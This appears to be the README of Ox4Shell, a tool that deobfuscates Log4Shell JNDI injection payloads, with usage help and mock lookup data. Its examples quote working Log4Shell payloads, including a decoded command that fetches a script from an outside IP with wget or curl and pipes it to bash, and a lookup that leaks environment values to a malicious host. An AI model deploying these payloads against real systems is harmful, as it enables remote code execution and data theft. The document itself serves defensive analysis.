${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

After running Ox4Shell, it would transform into an intuitive and readable form:

${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

This tool also helps to identify and decode base64 commands. For example, consider the following obfuscated payload:

${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

After running Ox4Shell, the tool reveals the attacker’s intentions:

${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

We recommend running Ox4Shell with a provided file (-f) rather than an inline payload (-p), because certain shell environments will escape important characters and therefore yield inaccurate results.

Usage

To run the tool simply:

~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

____ _ _ _____ _ _ _
/ __ \ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | \ \/ /__ _\___ \| '_ \ / _ \ | |
| |__| |> < | | ____) | | | | __/ | |
\____//_/\_\ |_||_____/|_| |_|\___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io

General:
-h, --help Show this help message and exit
-d, --debug Enable debug mode (default: False)
-m MOCK, --mock MOCK The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
--max-depth MAX_DEPTH
The maximum number of iterations to perform on a given payload (default: 150)
--decode-base64 Payloads containing base64 will be decoded (default: False)

Targets:
Choose which target payloads to run Ox4Shell on

-p PAYLOAD, --payload PAYLOAD
A single payload to deobfuscate, make sure to escape '$' signs (default: None)
-f FILE, --file FILE A file containing payloads delimited by newline (default: None)

Mock Data

The Log4j library has a few unique lookup functions, which allow users to look up environment variables, runtime information on the Java process, and so forth. This capability grants threat actors the ability to probe for specific information that can uniquely identify the compromised machine they targeted.

Ox4Shell uses the mock.json file to insert common values into certain lookup functions; for example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.

The default set of mock data provided is:

{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"user": "ubuntu",
"pwd": "/opt/",
"path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.version": "16.0.2",
"user.name": "ubuntu"
},
"java": {
"version": "Java version 16.0.2",
"runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
"vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
"os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, architecture: amd64-64"
}
}
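To illustrate how such a substitution works in principle, here is a toy snippet (not Ox4Shell's actual implementation) that mocks only ${env:...} lookups using the file above:

import json
import re

mock = json.load(open("mock.json"))

def substitute_env(payload: str) -> str:
    # Replace ${env:NAME} lookups with mocked values; unknown names are kept
    return re.sub(
        r"\$\{env:([^}]+)\}",
        lambda m: str(mock["env"].get(m.group(1).lower(), m.group(0))),
        payload,
    )

print(substitute_env("${jndi:ldap://x.${env:AWS_PROFILE}.bad/a}"))
# -> ${jndi:ldap://x.staging.bad/a}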

As an example, we can deobfuscate the following payload using the Ox4Shell's mocking capability:

~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"  
${jndi:ldap://16.0.2.staging.malicious.server/a}

Authors

License

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.


